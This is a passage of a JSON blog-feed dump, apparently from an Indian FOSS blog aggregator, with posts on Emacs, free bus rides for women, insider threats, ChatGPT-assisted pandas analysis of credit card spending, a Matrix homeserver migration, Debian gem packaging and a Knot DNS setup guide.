defaults.",[227,1144,457,1108],{"slug":1249,"title":1250,"link":1251,"pubDate":1252,"contentSnippet":1253,"tags":1254,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-20","Emerging from dotemacs bankruptcy the hard way: Prelude","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Femerging-from-dotemacs-bankruptcy\u002Findex.html","Thu, 29 Jun 2023 00:00:00 +0000","Or, finally biting the bullet to redesigning my developerly and writerly experience, from the ground up, with Emacs.",[227,1144,457,1108],{"slug":1256,"title":1257,"link":1258,"pubDate":1259,"contentSnippet":1260,"tags":1261,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"what-do-free-bus-rides-for-women-do","Free bus rides for women: What change do they bring?","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fwhat-do-free-bus-rides-for-women-do\u002F","Tue, 27 Jun 2023 01:00:50 +0530","Recently, I read news about Karnataka state government announcing free bus rides for women in the state. It was in the Indian National Congress’ pre-election guarantee, so no big surprise on the announcement. I wondered what changes this announcement makes in terms of people’s lives, even when the Delhi government announced such a scheme earlier. I thought such a decision is far from attaining any real goals of women safety and is only an easy way for politicians to earn some goodwill in the name of gender equality, rather than doing any long term work for gender equality. 
Earlier, when I saw the Delhi government’s advertisements for free bus tickets, they never made any claims about what the move was intended to achieve. One thing I could infer was that a greater number of women going out may improve safety, but I was overall not sure what this policy achieves.\nI got a new perspective on the issue when, a couple of days ago, I read an article by The Guardian on the same topic. Then I found another article with similar arguments in the Indian Express. Later I read a report in the Times of India on how a free bus ride scheme helped women in Chennai. These writeups shed light on benefits of free bus rides for women which I could not think of myself (shows my ignorance :( ).\nYou can click on the links of the articles and read them there. But I will summarize here: In India, many women rely on male family members for money (which is also used as a form of control) and so they have to rely on their savings to travel. I also had a misconception, due to the scheme’s counterpart in Delhi, that city bus fares are not high enough for free rides to make a real difference. But in the Karnataka case they are. I know from my experience that Karnataka’s capital city Bengaluru has expensive public transport compared to other Indian cities. For example, the bus fare from Bengaluru Airport to Satellite Bus Station, which is also in Bengaluru, was 246 Indian Rupees six years ago, and I have never seen such a high price in a government-run city bus in any other Indian city. Also, due to the scheme being available in the whole state, which I somehow overlooked, women will be able to get free rides for which they would have to pay a huge amount otherwise. This will boost their savings, ease travel for women, and increase the number of women in public transport, leading to even more women travelling in buses. It is also expected to increase women’s labour force participation, which matters in a country where it is very low. Obviously, such a scheme also needs to be evaluated in economic terms and in the bigger picture of state finances, but the point is that the scheme has a lot of potential and upsides, where earlier I struggled to find any.",[],{"slug":1263,"title":1264,"link":1265,"pubDate":1266,"contentSnippet":1267,"tags":1268,"maintainerName":130,"maintainerUsername":131,"maintainerPhoto":132,"feedUrl":133},"blog-bts-community-event","Behind the scenes of organising a community-driven event - part 1","https:\u002F\u002Fwww.divyamohan.com\u002Fblog-bts-community-event\u002F","Thu, 22 Jun 2023 06:14:32 GMT","I'll be the first one to admit - I had absolutely no plans of writing anything about organizing community-driven events. After all, organizing one (and helping co-organize another, as a volunteer) didn't make me an expert. \n\nAdditionally, as far as I was concerned, there was nothing",[701,1231,1232],{"slug":1270,"title":1271,"link":1272,"pubDate":1273,"contentSnippet":1274,"tags":1275,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"insider-threat","Why Indian Companies Are More Vulnerable To Insider Threats","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Finsider-threat\u002F","Wed, 21 Jun 2023 13:00:50 +0000","What exactly are Insider Threats? An insider threat is a perceived threat to an organization that comes from people within the organization, such as employees, former employees, contractors or business associates, who have inside information concerning the organization’s security practices, data and computer systems. 
The threat may involve fraud, the theft of confidential or commercially valuable information, the theft of intellectual property, or the sabotage of computer systems.\nThink of it like this: Let’s say some organisation has a super secure facility, with huge perimeter walls, barbed wire, cameras everywhere.",[],{"slug":1277,"title":1278,"link":1279,"pubDate":1280,"contentSnippet":1281,"tags":1282,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-21","What have you been curious about?","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fwhat-have-you-been-curious-about\u002Findex.html","Wed, 21 Jun 2023 00:00:00 +0000","Arguably a more interesting, revealing, and kinder question than \"What are you curious about?\"",[55,49],{"slug":1284,"title":1285,"link":1286,"pubDate":1287,"contentSnippet":1288,"tags":1289,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-22","Software demos as deliberate acts of serious play","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fsoftware-demos\u002Findex.html","Sun, 04 Jun 2023 00:00:00 +0000","Making a software demo is a form of deliberate, serious play. An act that feeds our curiosity, inventiveness, and drive. It enlivens. It enriches. It entertains. And as we asymptotically approach the A.G.I. that's just around the corner, the capacity for deliberate, serious play will remain distinctively, deeply, deliciously human. Career software people like yours truly may please take note!",[227,53,54,531,55],{"slug":1291,"title":1292,"link":1293,"pubDate":1294,"contentSnippet":1295,"tags":1296,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"this-time-it-feels-different","This time, it feels different","https:\u002F\u002Fnadh.in\u002Fblog\u002Fthis-time-it-feels-different\u002F","Sat, 13 May 2023 00:00:00 +0000","In an earlier post (2021), I argued that much of the “powered by AI \u002F ML” labelling and marketing out there was bogus and disingenuous. That AI \u002F ML technologies were getting commoditised to the point of being as simple as pip install, where most organisations would not need to do any serious R&D to be able to use these technologies, enough to warrant the claim “Powered by AI \u002F ML”. Excerpt from the post:",[],{"slug":1298,"title":1299,"link":1300,"pubDate":1301,"contentSnippet":1302,"tags":1303,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"learning-journey","Covid Lockdowns, And My Learning Journey","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Flearning-journey\u002F","Sat, 06 May 2023 18:29:57 +0000","Yesterday, I was just sitting and thinking about my time spent in COVID lockdowns. It was a harsh period for the whole world. It was a terrible year for everyone; millions of people died. While all my friends were stuck inside their homes playing video games, watching movies and doing other things, I wanted to do something productive. I was 13 years old at that time. 
That reminds me of this quote from the Harry Potter books: “Happiness can be found, even in the darkest of times, if one only remembers to turn on the light.",[],{"slug":1305,"title":1306,"link":1307,"pubDate":1308,"contentSnippet":1309,"tags":1310,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"about","About Me","https:\u002F\u002Fshrirangkahale.com\u002Fabout\u002F","Sat, 06 May 2023 00:00:00 +0000","I’m a 19 y\u002Fo who has a strong interest in Networking, DevOps, Aviation, RF and technology in general. I’m also experienced in working with Linux-based servers and enjoy tinkering with them to improve my skills.\nI am a believer of the free software philosophy and I contribute to FOSS by hosting a distributed mirror service (mirror.albony.in) which serves more than 20TB of traffic per day.\nI go by the alias “albony” \u002F “albonycal” on the internet.",[],{"slug":1312,"title":1313,"link":1314,"pubDate":1308,"contentSnippet":1315,"tags":1316,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"contact","Contact Me","https:\u002F\u002Fshrirangkahale.com\u002Fcontact\u002F","You can contact me via any of the following ways: Email: me@shrirangkahale.com\nTwitter: twitter.com\u002Falbonycal\nTelegram: @shrirangkahale\nMastodon: @albonycal@fosstodon.org Discord: @albony or Albony#1335\nMatrix: @albonycal:matrix.org\nSignal: shrirangkahale.1337\nLinkedIn: linkedin.com\u002Fin\u002Fshrirangkahale",[],{"slug":1318,"title":1319,"link":1320,"pubDate":1321,"contentSnippet":1322,"tags":1323,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"airtel-vi-routing","Another Case Of Bad Routing: Vi and Airtel","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fairtel_vi_routing\u002F","Mon, 01 May 2023 09:53:15 +0000","Even though Bharti Airtel (AS9498) is an upstream of Vodafone Idea (Vi) the routing between the two ISPs is consistently bad. While this heavily affects P2P traffic, it also has other impacts. ➜ VoWiFi (Voice Over WiFi) is very useful for places which have poor cellular coverage, But due to the horrible routing between the two ISPs the VoWiFi experience is bad. When I use VoWiFi (Vi SIM) on Airtel Broadband connection, there are constant call drops and stuttering.",[],{"slug":1325,"title":1326,"link":1327,"pubDate":1328,"contentSnippet":1329,"tags":1330,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"analyzing-credit-card-transactions","Analyzing credit card transactions with GPT and Python","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fanalyzing-credit-card-transactions\u002F","2023-04-30T07:08:02.000Z","You know those budget freaks? People who log and categorise every Rupee they’ve spent over the month? The financially sane people? I am definitely not one and I suck at it.\nI moved cities a couple of months back and had some big ticket spends off late, mostly financed by credit card. I wanted an easy way to list down where all I’ve spent most money and spot some recurring expenses so I can be better prepared for them from next month. I’ve found that broadly keeping an idea of things where you spend money works for me (v\u002Fs the two extremes - completely blind or logging every small transactions). 
Of course I know people who make budgeting a habit, but I only wish I was consistent enough to do that.\nAnyway, I downloaded the statement in CSV format from my bank.\nInitially I thought I’d use some simple Excel to make sense of this, but I realised how bad my Excel skills really are. I got an idea to dump the CSV file to ChatGPT (yay privacy) and ask questions. It kinda sucked at it and gave wrong answers for a lot of questions, and also started to hallucinate data which wasn’t even present in the CSV.\nThe next most obvious step would be to write a simple script and parse it. I wanted to see if ChatGPT could do this entire exercise of writing the script and the relevant code for the analysis I wanted to perform.\nHere’s the initial prompt I gave:\nI am pasting a CSV file which also includes the first row as header. Write Python code to parse this:\n\n,,Transaction Date,Details,,,Amount (INR),,,Reference Number,,\n,,27\u002F04\u002F2023,\"Blinkit, BANGALORE, IN\",,,290.00 Dr.,,,7477468633,,\n... other data ...\nIt returned the following code:\nimport pandas as pd\nfrom io import StringIO\n\ncsv_data = \"\"\"\\\n,,Transaction Date,Details,,,Amount (INR),,,Reference Number,,\n,,27\u002F04\u002F2023,\"Blinkit, BANGALORE, IN\",,,290.00 Dr.,,,747746xxxx,,\n# ... (the rest of your CSV data)\n,,03\u002F04\u002F2023,\"DIGITAL LOUNGE, GURGAON, IN\",,,799.00 Dr.,,,738201xxx,,\"\"\"\n\n# Read the CSV data into a pandas DataFrame\ndata = StringIO(csv_data)\ndf = pd.read_csv(data, header=1)\n\n# Clean up the DataFrame (remove unnecessary columns)\ndf = df.dropna(axis=1, how=\"all\")\n\n# Rename columns\ndf.columns = [\n    \"Transaction Date\",\n    \"Details\",\n    \"Amount (INR)\",\n    \"Reference Number\"\n]\n\nprint(df)\nLooking at this, I was a bit impressed, as it figured out that the CSV contained some useless empty columns and removed them (without me giving any information about it).\nI also asked it to modify the code to read the file locally from disk, and it swapped StringIO with the path to the CSV file:\n# Provide the file path to your local CSV file\nfile_path = \"your_file.csv\"\n\n# Read the CSV data into a pandas DataFrame\ndf = pd.read_csv(file_path, header=1)\n\nNext, I prompted it to do some analysis:\nWrite some more code to do the analysis to answer these questions:\n\n- How many total debit and credit entries\n- What is the total amount of debits and total amount of credits\n- Which vendor have I spent the most on?\n- How much have I spent on `SWIGGY` ?\nIt returned some one-liners to answer each question:\n# Filter debit and credit entries\ndebit_entries = df[df[\"Amount (INR)\"] > 0]\ncredit_entries = df[df[\"Amount (INR)\"] \u003C 0]\n\n# Count the total number of debit and credit entries\ntotal_debit_entries = len(debit_entries)\ntotal_credit_entries = len(credit_entries)\n\n# Calculate the total amount of debits and credits\ntotal_debit_amount = debit_entries[\"Amount (INR)\"].sum()\ntotal_credit_amount = credit_entries[\"Amount (INR)\"].sum()\n\n# Find the vendor with the most spending\nmost_spent_vendor = debit_entries.groupby(\"Details\")[\"Amount (INR)\"].sum().idxmin()\n\n# Calculate the total amount spent on SWIGGY\nswiggy_spending = debit_entries[debit_entries[\"Details\"].str.contains(\"SWIGGY\", case=False)][\"Amount (INR)\"].sum()\n\n# Calculate the total amount spent on AMAZON RECHARGES\namazon_recharges_spending = debit_entries[debit_entries[\"Details\"].str.contains(\"AMAZON RECHARGES\", case=False)][\"Amount (INR)\"].sum()\n\n# Print the results\nprint(f\"Total debit 
entries: {total_debit_entries}\")\nprint(f\"Total credit entries: {total_credit_entries}\")\n\nprint(f\"Total debit amount: {total_debit_amount}\")\nprint(f\"Total credit amount: {total_credit_amount}\")\n\nprint(f\"Vendor with the most spending: {most_spent_vendor}\")\n\nprint(f\"Total amount spent on SWIGGY: {swiggy_spending}\")\nAt this point, I knew that this would fail because we hadn’t cleaned up the data. The column Amount (INR) needs cleaning up. I prompted ChatGPT to write a function to clean this column:\nThe amount column has `21,620.54 Dr.` to represent that Rs 21,620.54 is debited. And `73,500.00 Cr.` to represent that Rs 73,500.00 is credited. Can you write a function to apply this transformation on the `Amount (INR)` column?\nIt responded with:\n# Clean up the data\ndef clean_amount(value):\n    if ' Cr.' in value:\n        value = value.replace(' Cr.', '')\n        return -float(value.replace(',', ''))\n    elif ' Dr.' in value:\n        value = value.replace(' Dr.', '')\n        return float(value.replace(',', ''))\n\ndf[\"Amount (INR)\"] = df[\"Amount (INR)\"].apply(clean_amount)\n\n# Now proceed with the analysis code\n\nPerfect! After transforming the amounts, I ran the analysis code:\n\nThe next prompt I gave was to analyse the spending in various categories.\nIn the above CSV file can you guess the categories of each merchant based on the `Details`? And write the code for grouping the spends on various categories. If you're unable to figure out the category for the transaction, you can use a \"Misc\" column to bucket them.\nIt actually did an okayish job at this and ignored a lot of vendors which I think it could have guessed easily:\ndef categorize(details):\n    details = details.lower()\n    if \"swiggy\" in details:\n        return \"Food Delivery\"\n    elif \"amazon recharges\" in details:\n        return \"Recharge\"\n    elif \"uber\" in details or \"ola\" in details:\n        return \"Cab\"\n    elif \"zomato\" in details:\n        return \"Food Delivery\"\n    elif \"netflix\" in details or \"prime video\" in details:\n        return \"Streaming\"\n    else:\n        return \"Misc\"\n\n# Create a new column called \"Category\" by applying the categorize function to the \"Details\" column\ndf[\"Category\"] = df[\"Details\"].apply(categorize)\n\n# Group the transactions by category and calculate the total amount spent in each category\ngrouped = df[df[\"Amount (INR)\"] > 0].groupby(\"Category\")[\"Amount (INR)\"].sum()\n\nprint(grouped)\nI decided to give some manual inputs to it to refine the function.\nI can help you with categorising it further.\n`Blink` -  Grocery\n`Indigo` - Travel\n`PEGS` - Alcohol\n`Nike` - Shopping\n\nAlso note that the category name matching should be case-insensitive.\nAnd it modified the Python snippet to add these rules.\n\nI had mixed reactions looking at this. Happy that I could practically get exactly the result I had in mind in just 10 minutes without writing any code. Sad because damn, I need to limit those empty calories from next month (famous last words).\nNext, I wanted to see if my spends on weekends are higher or not. 
(I don’t expect them to be, but you never know).\nPrompt:\nCan you also write the code to figure out how much I've spent, grouped by the day of week?\nResponse:\n# Convert the 'Transaction Date' column to a datetime format\ndf['Transaction Date'] = pd.to_datetime(df['Transaction Date'])\n\n# Create a new column called \"Day of Week\" containing the day of the week for each transaction\ndf['Day of Week'] = df['Transaction Date'].dt.day_name()\n\n# Group the transactions by the \"Day of Week\" and calculate the total amount spent on each day of the week\ngrouped_by_day = df[df[\"Amount (INR)\"] > 0].groupby('Day of Week')['Amount (INR)'].sum().abs()\n\n# Sort the grouped data by the total amount spent in descending order\nsorted_grouped_by_day = grouped_by_day.sort_values(ascending=False)\n\nprint(sorted_grouped_by_day)\n\nIt was a fun 10-15 min exercise to figure out my spending habits based on the last month’s statement. I intend to do this for the next couple of months, and then it would make sense to write more queries which would show trend-lines of spends in various categories over time.\nHonestly, I just loved how ChatGPT made this task so seemingly simple. It’s not that I can’t write the code for these kinds of simple analyses myself. It’s the sheer power at your fingertips to go from the ideation phase to an answer within seconds. And I think that’s why I love it so much. I didn’t have to go through the Pandas docs (because I don’t use Pandas in my day job, so it’s quite normal to not know the various syntax\u002Ffunctions I could use) or grok through different StackOverflow questions to achieve what I wanted. And imagining all this resistance on a Sunday morning would probably have meant that I never got to write the script in the first place.\nFin!",[],{"slug":1332,"title":1333,"link":1334,"pubDate":1335,"contentSnippet":1336,"tags":1337,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"02-mdad-html","How we migrated Project Segfault’s matrix homeserver to matrix-docker-ansible-deploy","https:\u002F\u002Faryak.me\u002Fblog\u002F02-mdad.html","Mon, 17 Apr 2023 12:39:46 +0000","Yesterday, we completed Project Segfault’s migration from\nmatrix.org’s official docker image for synapse to\nmatrix-docker-ansible-deploy.\nThis was because of how much of a pain it is to set up workers,\nespecially with docker. The docs aren’t great about it either.\nFor these reasons, we turned to matrix-docker-ansible-deploy.\nThe first issue we encountered was how spread out the docs were,\nthough they were very precise and well-explained.\nOnce we cloned the repo, we first had to set up the inventory hosts\nfile.\nSince we cloned the repo to the DockerVM itself, we had a weird\nsolution for this.\n[matrix_servers]\nmatrix.projectsegfau.lt ansible_host=localhost ansible_ssh_user=root\nAfter this, we had to add the pubkey of the VM to its own\nauthorized_keys. 
Wacky :P\nWith that sorted, we had to start configuring.\nFirstly, we had to prevent it from installing docker.\nThis is important since (re)installing docker will break a lot,\nespecially for our pre-existing services.\nmatrix_playbook_docker_installation_enabled: false\nAfter that, we had to add our old secret keys back to the config file\nso that it won’t break federation:\nmatrix_synapse_macaroon_secret_key: \"xxx\"\nmatrix_synapse_registration_shared_secret: \"xxx\"\nmatrix_synapse_form_secret: \"xxx\"\nThe signing key had to be re-added as well, but later after the setup\nwas complete.\nAfter that, we turned to the thing we migrated for, synapse\nworkers:\nSince the generic and federation_sender workers have to process a lot\nof data, we made 4 of each (totally didn’t copy the number from envs.net\n:P).\nmatrix_synapse_workers_enabled: true\nmatrix_synapse_workers_preset: one-of-each\nmatrix_synapse_workers_federation_sender_count: 4\nmatrix_synapse_workers_generic_worker_count: 4\nAnother important thing we had to take into consideration was\npostgres. We ran postgres on a separate VM and connected to the database\non it.\nmatrix_synapse_database_host: \"192.168.5.4\"\nmatrix_synapse_database_user: \"synapse\"\nmatrix_synapse_database_password: \"xxx\"\nmatrix_synapse_database_database: \"synapse\"\ndevture_postgres_enabled: false\nAfter the database, we had to set up registration\u002Flogin stuff.\nA weird thing I noticed about matrix-docker-ansible-deploy’s email\nconfiguration is that it uses its own relay, above our mail\ncredentials.\nmatrix_mailer_sender_address: \"matrix@projectsegfau.lt\"\nmatrix_mailer_relay_use: true\nmatrix_mailer_relay_host_name: \"mail.projectsegfau.lt\"\nmatrix_mailer_relay_host_port: 587\nmatrix_mailer_relay_auth: true\nmatrix_mailer_relay_auth_username: \"matrix@projectsegfau.lt\"\nmatrix_mailer_relay_auth_password: \"xxx\"\nmatrix_synapse_registrations_require_3pid: [ email ]\nmatrix_synapse_enable_registration: true\nmatrix_synapse_configuration_extension_yaml: |\n  oidc_providers:\n    - idp_id: authentik\n      idp_name: \"authentik\"\n      idp_icon: \"mxc:\u002F\u002Fenvs.net\u002F429bd4b307d32b919a94823f03acc7c24a7da61f\"\n      discover: true\n      issuer: \"https:\u002F\u002Fauth.p.projectsegfau.lt\u002Fapplication\u002Fo\u002Fmatrix\u002F\"\n      client_id: \"xxx\"\n      client_secret: \"xxx\"\n      scopes:\n        - \"openid\"\n        - \"profile\"\n        - \"email\"\n      user_mapping_provider:\n        config:\n          localpart_template: \"{% raw %}{{ user.preferred_username }}{% endraw %}\"\n          display_name_template: \"{% raw%}{{ user.name }}{% endraw %}\"\n          email_template: \"{% raw %}{{ user.email }}{% endraw %}\"\nPast this, we also had to port the small configurations we had in our\nold homeserver.yaml to the ansible format.\nSince most of these weren’t documented very well, we had to make\nheavy use of the defaults\nfile.\nmatrix_synapse_auto_join_rooms: [ '#project-segfault:projectsegfau.lt', '#support:projectsegfau.lt', '#general:projectsegfau.lt', '#announcements:projectsegfau.lt' ]\nmatrix_synapse_max_upload_size_mb: 700\nmatrix_synapse_allow_public_rooms_without_auth: true\nmatrix_synapse_allow_public_rooms_over_federation: true\nmatrix_synapse_email_client_base_url: \"https:\u002F\u002Fmatrix.to\"\nmatrix_synapse_email_invite_client_location: \"https:\u002F\u002Fchat.projectsegfau.lt\"\nmatrix_synapse_turn_uris: [\"turn:turn.projectsegfau.lt?transport=udp\", 
\"turn:turn.projectsegfau.lt?transport=tcp\"]\nmatrix_synapse_turn_shared_secret: \"xxx\"\nmatrix_synapse_turn_allow_guests: true\nmatrix_coturn_enabled: false\nmatrix_client_element_enabled: false\nAt this point we realized that we need to do a lot of weirder stuff\nto get it to work reverse-proxied behind our main caddy instance.\nWe reverse-proxied the traefik instance behind our caddy instance, as\nrecommended by the documentation\nwith the instructions there:\n# Ensure that public urls use https\nmatrix_playbook_ssl_enabled: true\n\n# Disable the web-secure (port 443) endpoint, which also disables SSL certificate retrieval\ndevture_traefik_config_entrypoint_web_secure_enabled: false\n\n# If your reverse-proxy runs on another machine, consider using `0.0.0.0:81`, just `81` or `SOME_IP_ADDRESS_OF_THIS_MACHINE:81`\ndevture_traefik_container_web_host_bind_port: '0.0.0.0:81'\n\n# We bind to `127.0.0.1` by default (see above), so trusting `X-Forwarded-*` headers from\n# a reverse-proxy running on the local machine is safe enough.\ndevture_traefik_config_entrypoint_web_forwardedHeaders_insecure: true\ndevture_traefik_additional_entrypoints_auto:\n  - name: matrix-federation\n    port: 8449\n    host_bind_port: '0.0.0.0:8449'\n    config: {}\nAfter all the configuration was done, we had to run it :P.\nFirstly, we had to install ansible and just, and run\njust roles to initialize all the ansible stuff.\nAt this point, we shut down our old matrix instance in order to not\ncause any issues.\nThen, we ran\nansible-playbook -i inventory\u002Fhosts setup.yml --tags=install-all\nto install all the files but not start the services.\nNow came the most time consuming part, importing the old media repo.\nConsidering its size at over 85 gigabytes.\nansible-playbook -i inventory\u002Fhosts setup.yml --extra-vars='server_path_media_store=\u002Fopt\u002Fdocker\u002Fmtrx\u002Ffiles\u002Fmedia_store' --tags=import-synapse-media-store\nThis took almost 30 minutes, the majority of the downtime we\nhad..\nAfter this was done, we were able to start the server:\nansible-playbook -i inventory\u002Fhosts setup.yml --tags=start.\nThe nginx\nconfiguration they recommended in the documentation for our\nreverse-proxy setup was pretty self-explanatory and easy to convert, but\nfor the fact that till now our matrix instance used normal delegation\nand did not make use of :8448.\nDue to this, we had to waste a lot of time trying to figure out which\nroutes went to which ports. 
I wish the documentation explained this\nbetter.\nAt the end, this was the caddy configuration we came up with for\nthis:\nmatrix.projectsegfau.lt {\n    reverse_proxy \u002F_matrix\u002F* 192.168.5.2:8449\n    reverse_proxy \u002F_matrix\u002Fclient\u002F* 192.168.5.2:81\n    reverse_proxy \u002F_synapse\u002F* 192.168.5.2:81\n}\nThis configuration works right now, though we are still not\ncompletely sure if other routes need to go somewhere else.\nI do have some gripes with it though, such as the ages it takes for\nrestarts (--tags=setup-build and then --tags=restart for those wondering)\nand the lack of documentation on the recommended upstream\ndelegation configuration.\nAt the end, matrix-docker-ansible-deploy simplified our config a lot\nand relieved a lot of the maintenance burden we would have had if we had\nconfigured it manually, and I am thankful for that.",[1338],"2023\u002F04\u002F17\u002F1",{"slug":1340,"title":1341,"link":1342,"pubDate":1343,"contentSnippet":1344,"tags":1345,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-23","Cold restart whole system after total outage","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fcold-restart-total-outage\u002Findex.html","Fri, 07 Apr 2023 00:00:00 +0000","\"What are folks’ views on systems so large where cold-starting the whole system is almost impossible?\"... — M'colleague, Shivam, In A Slackroom Next Door.",[49,723,1346,55],"complexity",{"slug":1348,"title":1349,"link":1350,"pubDate":1351,"contentSnippet":1352,"tags":1353,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"debian-packaging-removing-git-from-gemspec","Debian Packaging Tutorial: Removing Git From Gemspec","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fdebian-packaging-removing-git-from-gemspec\u002F","Wed, 05 Apr 2023 01:48:53 +0530","Recently, I was packaging silent_stream for Debian. sbuild was showing an error because there was git in the gemspec file. Specifically, this line\n`git ls-files -z`.split(\"\\x0\").reject { |f| f.match(%r{^(tests|spec|features)\u002F}) }\n\nin this file.\nThanks to Vinay who helped me in fixing this. It took some time, and it is common to run into this error, I was told. So, I am documenting what worked for me.\nWe will use quilt, and Raphael has written a good article on how to use it to patch. You will need to set up quilt first, which is explained in the article.\n—————Run all these commands in debian unstable environment—————————–\nSince I had already pushed my changes to salsa.debian.org, I had to clone the repository. We do this by using:\ngbp clone --pristine-tar git@salsa.debian.org:ruby-team\u002Fruby-silent-stream.git\ncd into the repository just cloned\ncd ruby-silent-stream\nNow, insert a new empty patch\nquilt new remove-git-in-gemspec.patch\nTell quilt that you intend to modify files\nquilt add silent_stream.gemspec\nEdit the file that needs to be fixed. 
In our case, it is the silent_stream.gemspec file:\nvim silent_stream.gemspec\nDelete lines 50, 51 and 52 in this file.\nReplace those lines with:\nspec.files = Dir.glob(\"**\u002F*\")\nand save the file.\nTo generate the patch, run\nquilt refresh\nAdd metadata to your patch header\nquilt header --dep3 -e\nAdd the debian\u002Fpatches directory to the git staging area:\ngit add debian\u002Fpatches\nRestore the gemspec file:\ngit restore silent_stream.gemspec\nRun debclean:\ndebclean\nBefore running sbuild, I had to import the tar files into the parent directory:\nuscan --verbose -dd --download-current-version\nCheck if sbuild is successful.\nsbuild -d unstable (where to run this command depends on how you set up sbuild and your debian unstable)\n—————–Run above commands in debian unstable environment————\nIf the sbuild was successful, then commit and push your changes. I usually commit in my host system, as signing the commits does not work for me inside chroot or the unstable environment I set up using systemd-nspawn.\ngit commit -S -m \"add remove-git-in-gemspec.patch\"\n\nSo, that’s it for this tutorial. Meet you in the next post.",[],{"slug":1355,"title":1356,"link":1357,"pubDate":1358,"contentSnippet":1359,"tags":1360,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"important-question-not-asked-prav","Nobody asked this important question about Prav","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fimportant-question-not-asked-prav\u002F","Fri, 24 Mar 2023 13:35:25 +0530","Earlier this month, I gave a presentation introducing Prav along with my friend Arun. Many people got curious and asked various questions about the project. However, I was surprised that nobody inquired about the operation of a privacy messaging service in India, especially considering the weakening privacy laws in the country as highlighted in this article.\nThe conference where I presented had at least two talks\u002Fdiscussions on the policy\u002Flaw aspects of technology. Even outside the conference, I did not encounter this question, which I believe is crucial. 
It seems that people are not yet fully aware of the implications of the new IT rules.\nUpdate on 27 May 2023: This question was later raised on social media, reminding me of a similar question asked here before I wrote this post.",[],{"slug":1362,"title":1363,"link":1364,"pubDate":1365,"contentSnippet":1366,"tags":1367,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"01-knot-html","Setting up Knot DNS - DNSSEC, GeoDNS, RFC2136,authenticated zonefile sync and more!","https:\u002F\u002Faryak.me\u002Fblog\u002F01-knot.html","Wed, 01 Mar 2023 12:39:46 +0000","Knot DNS is one of the easier to\nsetup authoritative dns servers out there, made by NIC.CZ.\nIn this tutorial I’ll show how to setup Knot with DNSSEC,\nauthenticated master -> slave sync, RFC2136 (for automatic dns-based\ncerts in caddy and such) and GeoDNS, which makes the server give an IP\nclosest to the user.\nI assume you have two Debian based systems, with port 53 (tcp+udp)\nforwarded.\nInstalling Knot\nThis guide covers debian, but instructions for other distributions\ncan be found on the download\npage Run the following on both the master and the slave:\napt-get -y install apt-transport-https lsb-release ca-certificates wget\nwget -O \u002Fusr\u002Fshare\u002Fkeyrings\u002Fknot.gpg https:\u002F\u002Fdeb.knot-dns.cz\u002Fapt.gpg\nsh -c 'echo \"deb [signed-by=\u002Fusr\u002Fshare\u002Fkeyrings\u002Fknot.gpg] https:\u002F\u002Fdeb.knot-dns.cz\u002Fknot-latest\u002F $(lsb_release -sc) main\" > \u002Fetc\u002Fapt\u002Fsources.list.d\u002Fknot-latest.list'\napt-get update\napt-get install knot knot-dnsutils\n\nBasic Configuration\nknot.conf\nNow, to add in the basic configuration, overwrite the\n\u002Fetc\u002Fknot\u002Fknot.conf file on the master with the following\ntext:\nserver:\n    rundir: \"\u002Frun\u002Fknot\"\n    user: knot:knot\n    listen: 0.0.0.0@53\nlog:\n  - target: syslog\n    any: info\ndatabase:\n    storage: \"\u002Fvar\u002Flib\u002Fknot\"\nremote:\n  - id: secondary\n    address: your.other.servers.ip@53\nacl:\n  - id: acl_secondary\n    address: your.other.servers.ip\n    action: transfer\ntemplate:\n  - id: default\n    storage: \"\u002Fetc\u002Fknot\u002Fzones\"\n    file: \"%s.zone\"\n    semantic-checks: on\n    # Don't override zonefile\n    zonefile-sync: -1\n    zonefile-load: difference-no-serial\n    journal-content: all\nzone:\n  - domain: your.domain\n    notify: secondary\n    acl: acl_secondary\nOn the slave, overwrite the same file with the following text:\nserver:\n    rundir: \"\u002Frun\u002Fknot\"\n    user: knot:knot\n    listen: 0.0.0.0@53\nlog:\n  - target: syslog\n    any: info\ndatabase:\n    storage: \"\u002Fvar\u002Flib\u002Fknot\"\nremote:\n  - id: primary\n    address: your.main.servers.ip@53\nacl:\n  - id: acl_primary\n    address: your.main.servers.ip\n    action: notify\ntemplate:\n  - id: default\n    storage: \"\u002Fetc\u002Fknot\u002Fzones\"\n    file: \"%s.zone\"\nzone:\n  - domain: your.domain\n    master: primary\n    acl: acl_primary\nZonefile\nAt this point you need to create \u002Fetc\u002Fknot\u002Fzones on both\nthe master and slave as that is where the zonefiles will be stored. Now\ncreate a file named your.domain.zone in the directory on the master\nalone and add the following text to it:\n$ORIGIN your.domain. ; 'default' domain as FQDN for this zone\n$TTL 3600 ; default time-to-live for this zone\n\nyour.domain.   IN  SOA     ns1.your.domain. ns2.your.domain. 
